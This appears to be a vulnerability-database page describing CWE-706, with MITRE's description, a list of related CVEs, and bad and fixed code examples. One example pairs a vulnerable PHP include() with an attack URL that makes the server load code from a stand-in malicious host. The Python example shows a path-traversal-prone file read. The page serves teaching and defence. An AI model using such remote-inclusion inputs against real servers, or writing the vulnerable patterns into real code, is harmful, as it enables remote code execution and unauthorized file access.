Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-706 (使用不正确的解析名称或索引) — Vulnerability Class 36

36 vulnerabilities classified as CWE-706 (使用不正确的解析名称或索引). AI Chinese analysis included.

CWE-706 represents a critical input validation weakness where a software system incorrectly resolves a name or reference, leading to access of resources outside its intended control sphere. This vulnerability typically arises when applications fail to properly sanitize or validate user-supplied identifiers, allowing attackers to manipulate references to point to unauthorized files, database entries, or network endpoints. Exploitation often involves path traversal or pointer manipulation, enabling unauthorized data access, privilege escalation, or system compromise by redirecting operations to sensitive areas. To mitigate this risk, developers must implement strict input validation, ensuring all references are checked against a whitelist of allowed values. Additionally, using canonicalization techniques to normalize paths before resolution and employing least-privilege principles for resource access can significantly reduce the attack surface, ensuring that resolved references remain within the expected and secure boundaries of the application’s operational environment.

MITRE CWE Description
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, IntegrityRead Application Data, Modify Application Data
Examples (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os import sys def main(): filename = sys.argv[1] path = os.path.join(os.getcwd(), filename) try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Bad · Python
import os import sys def main(): filename = sys.argv[1] path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"): try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Good · Python
CVE IDTitleCVSSSeverityPublished
CVE-2022-28198 NVIDIA Omniverse 安全漏洞 — NVIDIA Omniverse Nucleus 6.6 Medium2022-04-29
CVE-2021-37215 Larvata Digital Technology Co. Ltd. FLYGO - Use of Incorrectly-Resolved Name or Reference-4 — FLYGO 4.3 Medium2021-08-09
CVE-2021-37214 Larvata Digital Technology Co. Ltd. FLYGO - Use of Incorrectly-Resolved Name or Reference-3 — FLYGO 8.8 High2021-08-09
CVE-2021-37213 Larvata Digital Technology Co. Ltd. FLYGO - Use of Incorrectly-Resolved Name or Reference-2 — FLYGO 4.3 Medium2021-08-09
CVE-2021-37212 Larvata Digital Technology Co. Ltd. FLYGO - Use of Incorrectly-Resolved Name or Reference-1 — FLYGO 5.4 Medium2021-08-09
CVE-2020-26233 Remote Code Execution in Git Credential Manager Core — Git-Credential-Manager-Core 7.3 High2020-12-08

Vulnerabilities classified as CWE-706 (使用不正确的解析名称或索引) represent 36 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.